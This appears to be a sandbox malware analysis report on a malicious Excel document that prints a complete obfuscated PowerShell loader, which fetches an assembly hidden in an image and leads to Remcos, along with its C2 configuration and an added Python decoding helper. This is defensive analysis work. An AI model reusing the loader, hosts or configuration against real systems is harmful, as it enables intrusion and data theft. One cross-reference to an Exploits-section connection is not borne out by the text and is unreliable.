[System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = 
[System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
                  Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3604, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creatednewimagesinpicturebuttersmo.vBS" , ProcessId: 3208, ProcessName: wscript.exe
                  Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3604, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? 
? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ?
                  Source: File created, Author: Nasreddine Bencherchali (Nextron Systems), Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3816, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                  Source: File created, Author: frack113, Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3308, TargetFilename: C:\Users\user\AppData\Local\Temp\z4z03ydu.kcd.ps1

                  Data Obfuscation

                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = 
$loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ?
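The two PowerShell command lines recorded above are one script at two stages. The parent carries `$Codigo`, the base64 of the UTF-16LE script text with every `A` swapped for a marker (this report renders the marker as `? ? ? ? ?`; the original marker characters are not recoverable from the page). Decoding the printed prefix yields exactly the child command line: it downloads vbs.jpg from archive.org, carves the text between `<<BASE64_START>>` and `<<BASE64_END>>`, base64-decodes it, loads the result as a .NET assembly with `Assembly.Load` and calls `dnlib.IO.Home.VAI`. The first argument to VAI is the next-stage URL written backwards; reversed it reads http://198.12.81.228/600/RGGV.txt, the same host the Exploits section shows EQNEDT32.EXE contacting on port 80. The fifth argument, RegAsm, names the host process in which the report later finds Remcos. One detail worth noting: `$startIndex -ge 0 -and $endIndex -gt $startIndex;` is evaluated as a bare expression and never branched on, so if the markers are missing the loader fails with an exception at Substring rather than exiting quietly. The Python below is an analyst helper added for this page, not code from the report or from the sample: it decodes the $Codigo fragment exactly as printed, extracts the indicators from the child command line, and carves a payload from a constructed stand-in for the downloaded image. The marker string and the constructed image are assumptions; every other value is taken from the report.

```python
"""
Analyst helper added for this page; not code from the Joe Sandbox report or
from the sample. Reverses the layers visible in the two PowerShell command
lines above: the $Codigo marker substitution, the UTF-16LE base64 under it,
and the reversed-string URL handed to dnlib.IO.Home.VAI.
"""
import base64
import re

# The report renders every 'A' of the $Codigo base64 text as these nine
# characters; the original marker did not survive rendering, so using the
# rendered form as the marker is an assumption.
MARKER = "? ? ? ? ?"

# First 224 base64 symbols of $Codigo, copied from the report as printed.
CODIGO_FRAGMENT = (
    "J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?"
    "JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?"
    "M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?"
    "a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?"
    "aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?"
    "Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?"
    "Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?"
)

# The child command line, copied from the report (it is the decoded $Codigo).
CHILD_CMD = (
    "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';"
    "$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);"
    "$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);"
    "$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';"
    "$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);"
    "$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;"
    "$base64Length = $endIndex - $startIndex;"
    "$base64Command = $imageText.Substring($startIndex, $base64Length);"
    "$commandBytes = [System.Convert]::FromBase64String($base64Command);"
    "$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);"
    "$type = $loadedAssembly.GetType('dnlib.IO.Home');"
    "$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VGGR/006/822.18.21.891//:ptth' , "
    "'desativado' , 'desativado' , 'desativado','RegAsm',''))"
)


def decode_codigo(blob, marker=MARKER):
    """Undo marker substitution -> base64 -> UTF-16LE. Only whole base64 quads
    and whole UTF-16 code units are decoded, so a truncated fragment (as the
    report prints it) still yields its readable prefix instead of raising."""
    b64 = blob.replace(marker, "A")
    b64 = b64[: len(b64) - len(b64) % 4]
    raw = base64.b64decode(b64)
    return raw[: len(raw) - len(raw) % 2].decode("utf-16-le")


def parse_loader(cmd):
    """Pull the indicators out of the decoded loader. The first VAI argument
    is the next-stage URL written backwards; the fifth names the process the
    payload is injected into."""
    stage_url = re.search(r"\$imageUrl\s*=\s*'([^']+)'", cmd).group(1)
    start_flag = re.search(r"\$startFlag\s*=\s*'([^']+)'", cmd).group(1)
    end_flag = re.search(r"\$endFlag\s*=\s*'([^']+)'", cmd).group(1)
    entry = re.search(r"GetType\('([^']+)'\).*?GetMethod\('([^']+)'\)", cmd)
    args = re.findall(r"'([^']*)'", cmd[entry.end():])
    return {
        "stage_url": stage_url,
        "flags": (start_flag, end_flag),
        "entry_point": f"{entry.group(1)}.{entry.group(2)}",
        "args": args,
        "next_stage_url": args[0][::-1],
        "inject_target": args[4],
    }


def extract_between(text, start_flag, end_flag):
    """The loader's carving step, with the bounds check the original only
    evaluates and never acts on: a missing or inverted marker returns None."""
    s = text.find(start_flag)
    e = text.find(end_flag)
    if s < 0 or e <= s:
        return None
    return base64.b64decode(text[s + len(start_flag):e])


# Constructed stand-in for vbs.jpg: a few JPEG-looking bytes, then the
# delimited base64 of a constructed payload (not the real dnlib-based stage).
FAKE_PAYLOAD = b"MZ-constructed-payload"
FAKE_IMAGE = (b"\xff\xd8\xff\xe0 not really a picture <<BASE64_START>>"
              + base64.b64encode(FAKE_PAYLOAD) + b"<<BASE64_END>> trailer")

if __name__ == "__main__":
    print(decode_codigo(CODIGO_FRAGMENT))
    info = parse_loader(CHILD_CMD)
    for key, value in info.items():
        print(f"{key}: {value}")
    # Mirror the loader: UTF8.GetString on the raw bytes, then carve.
    print(extract_between(FAKE_IMAGE.decode("utf-8", "replace"), *info["flags"]))
```

Run as a script it prints the decoded prefix, the indicator table, and the carved payload. The same three functions apply to the other loaders of this family seen with different markers: change MARKER, paste the $Codigo value, and the rest of the chain falls out.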

                  Stealing of Sensitive Information

                  Source: Registry Key set, Author: Joe Security, Data: Details: CD 29 1C FA EC C0 35 3B A1 ED 56 E5 3A 6F A6 17 A7 71 46 10 BD EE 7F 44 47 88 F9 A2 F6 2A 67 BD 3A E1 64 07 D0 D5 3A 1B E4 EA 27 CA 7A CD 6A DE 7B 37 71 3A 68 41 30 FC 7D 01 D5 76 BE D8 4C 88 D4 AF 62 AE D9 7B B4 D9 D1 81 4B 80 44 31 FD 7B D1 1F FC 0A 12 66 81 37 2E 7E C1 CD 4B 41 3F 05 0F D2 1A 5D 31 80 1D 42 FE B1 DA DA E9 CD 25 30 E2 1A , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 2496, TargetObject: HKEY_CURRENT_USER\Software\Rmc-4CT19T\exepath
                  Suricata IDS alerts
                  Timestamp                        SID      Severity  Source Port  Destination Port  Protocol  Classtype
                  2024-08-28T22:29:41.372209+0200  2036594  1         49173        2404              TCP       Malware Command and Control Activity Detected
                  2024-08-28T22:29:42.525533+0200  2036594  1         49174        2404              TCP       Malware Command and Control Activity Detected
                  2024-08-28T22:29:40.121636+0200  2020423  1         80           49172             TCP       Exploit Kit Activity Detected
                  2024-08-28T22:29:40.121636+0200  2020425  1         80           49172             TCP       Exploit Kit Activity Detected
                  2024-08-28T22:29:42.678496+0200  2803304  3         49175        80                TCP       Unknown Traffic
                  2024-08-28T22:29:39.341451+0200  2049038  1         443          49171             TCP       A Network Trojan was detected


                  AV Detection

                  Source: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg, URL Reputation: Label: malware
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc, Avira: detection malicious, Label: HEUR/Rtf.Malformed
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp, Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
                  Source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, Malware Configuration Extractor: Remcos {"Host:Port:Password": "192.3.101.172:2404:1192.3.101.172:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4CT19T", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx, ReversingLabs: Detection: 18%
                  Source: Yara match, File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara match, File source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Source: SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx, Joe Sandbox ML: detected
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 14_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 14_2_004338C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Code function: 15_2_00404423 FreeLibrary,CryptUnprotectData, 15_2_00404423
                  Source: powershell.exe, 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_bf9d7ce0-8

                  Exploits

                  Source: Yara match, File source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara match, File source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
